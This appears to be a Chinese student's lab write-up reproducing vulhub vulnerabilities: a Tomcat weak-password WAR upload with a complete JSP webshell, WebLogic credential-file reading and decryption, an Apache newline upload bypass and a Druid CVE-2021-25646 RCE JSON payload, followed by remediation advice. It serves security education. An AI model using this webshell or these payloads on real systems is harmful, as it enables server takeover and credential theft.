9.4作业

已于 2024-09-09 08:57:28 修改
阅读量534 收藏 3
点赞数 4
文章标签: 安全 web安全
于 2024-09-08 17:19:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oo_oooo/article/details/142028315
版权

目录:

作业一、在vps安装docker和docker-compose

作业二、上课涉及的vulhub中的漏洞,全部复现,同时说明漏洞成因

#环境安装#https://vulhub.org/#/environments/tomcat/tomcat8/

tomcat 弱口令/后台文件上传getshell

漏洞复现:

环境启动

弱口令/后台文件上传getshell

漏洞成因:

weblogic 弱口令/任意文件读取

漏洞复现:

弱口令/任意文件读取

漏洞成因:

apache 换行解析

漏洞复现:

漏洞成因:

CVE-2021-25646(druid RCE)

环境搭建:

漏洞复现:

漏洞成因:

RCE漏洞的原理、利用条件及解决方案

漏洞原理:

利用条件:

解决方案:

作业一、在vps安装docker和docker-compose

#基础环境:阿里云,ubuntu22.04

可能获取不到软件包,可以尝试更新一下,或者换一下源

sudo apt update        #更新
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<-'EOF'
{
  "registry-mirrors": ["https://s41jdkxd.mirror.aliyuncs.com"]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker
#阿里云镜像加速,每个实例都不一样,可以在容器镜像服务里查询得到

配置好后,下载docker和docker-compose

apt install docker.io              #docker
apt install docker-compose         #docker-compose

成功截图:

作业二、上课涉及的vulhub中的漏洞,全部复现,同时说明漏洞成因

#环境安装#icon-default.png?t=O83Ahttps://vulhub.org/#/environments/tomcat/tomcat8/

tomcat 弱口令/后台文件上传getshell

漏洞复现:
环境启动

进入tomcat8目录,输入命令启动环境

docker-compose up -d  #启动环境

查看容器,端口映射为8080端口,主机访问网站。网址为:实例公网ip:8080

弱口令/后台文件上传getshell

使用tomcat的默认账号密码登录。(账号密码均为tomcat)

木马生成:使用命令将shell.jsp打包为war包

jar -cvf shell.war shell.jsp

shell.jsp内容

<%!
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
 
    public Class g(byte[] b) { return super.defineClass(b,0, b.length); }
 
    }
 
    public byte[] base64Decode(String str) throws Exception { try { Class
    clazz=Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer",
    String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class
    clazz=Class.forName("java.util.Base64"); Object decoder=clazz.getMethod("getDecoder").invoke(null); return (byte[])
    decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } }%><%
 
    String cls=request.getParameter("passwd");if(cls!=null)
    {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}%
>

木马上传:在上传窗口上传shell.war文件,访问文件上传路径。使用蚁剑进行连接

进入命令行,连接成功,复现成功

漏洞成因:

弱口令:Tomcat有一个默认账户和密码,有时为了方便,没有对其进行修改

后台文件上传:Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,为木马注入创造了条件。

weblogic 弱口令/任意文件读取

漏洞复现:

环境启动:与上一环境相同(后面不再重复)

弱口令/任意文件读取

弱口令:使用使用默认口令weblogic/Oracle@123登录。

尝试访问“http://47.96.74.191:7001/hello/file.jsp?path=/etc/passwd”读取敏感文件。

下载成功,说明可能存在任意文件读取漏洞

使用bp抓包,读取SerializedSystemIni.dat和config.xml。前者为密钥文件,后者为全局配置文件。

首先抓取SerializedSystemIni.dat文件。访问http://47.96.74.191:7001/hello/file.jsp?path=security/SerializedSystemIni.dat

复制选区到新的文件

抓取config.xml,访问http://47.96.74.191:7001/hello/file.jsp?path=config/config.xml

复制选区密码文件到新的文件

使用vulhub自带的weblogic_decrypt.jar,解密密文

java -jar weblogic_decrypt.jar    #启用文件

漏洞成因:

弱口令:管理员密码配置不当,存在弱口令

任意文件读取:服务器在处理用户请求时,没有对输入内容进行充分的限制和过滤,导致攻击者可以通过构造特殊的请求,读取任意文件的内容。

apache 换行解析

漏洞复现:

访问http://47.96.74.191:8080

查看源代码,发现php,php3等都不能上传。考虑使用换行的方式上传文件

正常上传,发现确实会被识别过滤。

在文件名后插入一个换行符,十六进制为0a

漏洞成因:

查看源代码可知,本质上是在对文件的过滤方式上存在漏洞,使用添加换行符的方式可以绕过。

CVE-2021-25646(druid RCE)

环境搭建:
wget https://github.com/apache/druid/archive/druid-0.20.0.zip    #获取压缩包
apt install unzip         #安装压缩包
unzip druid-0.20.0.zip    #解压
cd druid-0.20.0/distribution/docker
docker-compose up -d      #搭载环境

漏洞复现:

访问8888端口,进入Druid console控制台界面

逐步添加以下内容:

  • Base directory: quickstart/tutorial/
  • File filter: wikiticker-2015-09-12-sampled.json.gz

开启bp抓包,修改post请求包为以下内容。

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

漏洞成因:

在 Druid 中,经过身份验证的用户可以构造json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。

RCE漏洞的原理、利用条件及解决方案

漏洞原理:

RCE又叫远程命令执行漏洞,通常出现在一些允许用户提交命令的应用系统中。比如,在一些路由器,防火墙或入侵检测的Web界面中,为了方便用户进行网络诊断或监控,系统有时会提供一个简单的Web表单让用户输入IP地址或其他的一些参数,并通过后台执行相应的命令来响应用户的请求。但要是在设计和实现过程中,开发人员没有正确地验证和过滤用户的输入,就可能产生此类漏洞。

利用条件:

1.开发人员调用执行系统命令的函数。

2.传入exec()或者ProcessBuilder()的参数用户前端可控。

3.服务端没有对传入参数进行检查或过滤不严。

解决方案:

1.输入验证和输出编码:可以使用正则表达式或其他手段来检查输入是否符合预期的格式和内容。对于用户提供的数据,在使用之前对其进行编码或转义,以防止其被解释为代码或命令的一部分。

2.遵循最小权限原则:应用程序应该以受限账户身份运行,这样即使发生RCE漏洞,攻击者也只能获得有限的权限。

3.禁用或替换危险函数:避免使用存在高风险的函数,如PHP中的eval(), system(), exec()等。如果必须使用这些函数,则要确保传递给它们的所有参数都是安全的。

4.使用沙箱或容器化:将应用程序置于一个隔离的环境中运行,这样即便发生RCE,也能限制其影响范围。

   

oo_oooo
关注
IntelliJ IDEA [警告] pom的依赖中出现警告Provides transitive vulnerable dependency
好久不见的流星
12-31 1万+
在我们的工程 pom.xml 中的依赖中,所依赖的 spring-boot-starter-web 出现了警告(Provides transitive vulnerable dependency maven:ch.qos.logback:logback-classic:1.4.11),本文将介绍如何去消灭它。
python for everybody作业和测试答案_PY4E-Python for Everybody课后作业答案
weixin_39700397的博客
11-21 3057
本文练习题答案仅涉及编程部分,其余部分略过。每一道题都经过运行确保正确,仅供参考!Chapter 1 为什么要学编程?较简单、概念化。略Chapter 2 变量、表达式、语句习题 2: 使⽤ input 编写⼀个程序,提⽰⽤⼾输⼊姓名,然后打印欢迎语。name = input("Enter your name:\n")print("Hello " + name)习题 3: 编写⼀个程序,提⽰⽤⼾...
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
sinat_32849897的博客
07-02 1359
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评...
Tomcat系列漏洞复现
Anubizs的博客
07-22 664
由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。在Tomcat的配置文件中设置了可写(readonly=false),导致可以往服务器写文件。文件,可以看到和我们POC读取的文件是一模一样的,因此,漏洞复现成功。抓包,然后发送如下数据包,可以上传jsp。
幽灵猫 Tomcat文件读取/任意文件包含漏洞(CVE-2020-1938 / CNVD-2020-10487)
m0_62466350的博客
05-11 3930
该漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
tomcat系列漏洞
qq_56150805的博客
05-06 2258
Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP 协议的请求,而AJP比http更加优化,多用于反向、集群等,漏洞由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用,是开发和调试Servlet、JSP 程序的首选。
计算热物理 9.4作业
03-10
在本压缩包中,我们关注的是“计算热物理 9.4作业”,这涉及到一个学科领域——计算热物理,以及使用MATLAB编程语言解决相关问题。计算热物理是热力学与流体力学的一个分支,它利用数值方法来研究热能的传输、转化...
-Python-For-Everybody-Coursera-
03-09
适用于所有人的Python 该存储库包含从密歇根大学在Coursera的在线学习课程中获得的材料和证书 关于本专业 本专业课程以“ Python for Everybody”课程的成功为基础,并将介绍使用Python编程语言的基本编程概念,...
八年级物理下册 9.4 功率作业(无答案) 鲁教版五四制 试题.doc
11-11
功率是衡量物体做功快慢的物理量,它在物理学中占据着重要的地位。在八年级物理下册的第9.4章节中,学生需要掌握功率的基本概念和计算方法。 1. 在做“引体向上”时的功率计算中,不需要测量的物理量是单杠的高度...
2015年春七年级数学下册 9.4 乘法公式作业2(无答案)(新版)苏科版
08-19
这篇资料是针对七年级下学期数学课程中9.4章节乘法公式的一个作业,主要涉及平方差公式和完全平方公式的应用。乘法公式是初中数学中的基础内容,对于解决各种代数问题至关重要。 1. 平方差公式是形如 `(a+b)(a-b)=a...
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6801
网络安全-CVE - CIS 漏洞分析以及解决
【Tomcat-8.5.19】文件写入漏洞
m0_63241485的博客
08-25 3748
tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。
第八天作业
最新发布
m0_64429977的博客
09-06 660
1)RCE(远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,测可能会导致攻击者通过该接口提交“意想不到"的命令,从而让后台进行执行,从而控制整个后台服务器。
中间件漏洞攻防学习总结
蚁景网安学院
04-09 1276
Apache(阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。
Apache Tomcat CVE-2020-1938 漏洞
qq_50854662的博客
04-14 2615
Apache Tomcat CVE-2020-1938 漏洞
tomcat 漏洞集合
qq_53229503的博客
09-02 7592
tomcat 漏洞集合
word 代码_微软补丁日:Word/DHCP/LNK远程代码执行漏洞预警
weixin_39986896的博客
11-29 170
0x00 漏洞背景2019年8月14日微软发布的安全更新中除了RDP漏洞还涵盖了针对多个远程代码执行高危漏洞的修复。Microsoft Word远程代码执行漏洞, 漏洞编号CVE-2019-0585。Windows DHCP客户端远程代码执行漏洞, 漏洞编号CVE-2019-0736。LNK远程代码执行漏洞,漏洞编号CVE-2019-1188。0x01 漏洞详情LNK远程代码执行漏洞...
tomcat也终于出现漏洞了
懿的博客
07-20 1070
、 1.Tomcat漏洞介绍 使用 Apache Tomcat 软件了 Java Servlet,JavaServer 页,Java 表达式语言和 Java 的 WebSocket 技术的一个开源实现。Java Servlet,JavaServer Pages,Java Expression Language和Java WebSocket规范是在Java Community Process下开发的 。 阿粉相信大家现在用什么版本的多有,从7.0到目前最新的10.0的用什么版本的都有,但是现在,Tomcat
pdi-ce-9.4 部署 安装
09-14
7. 在创建和编辑任务时,你可以使用PDI-CE-9.4提供的各种转换步骤和作业入口来操作数据。 8. 在完成任务设置和编辑后,你可以点击菜单栏中的"运行"按钮来执行任务。你还可以使用调试功能来调试任务并查看执行过程中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值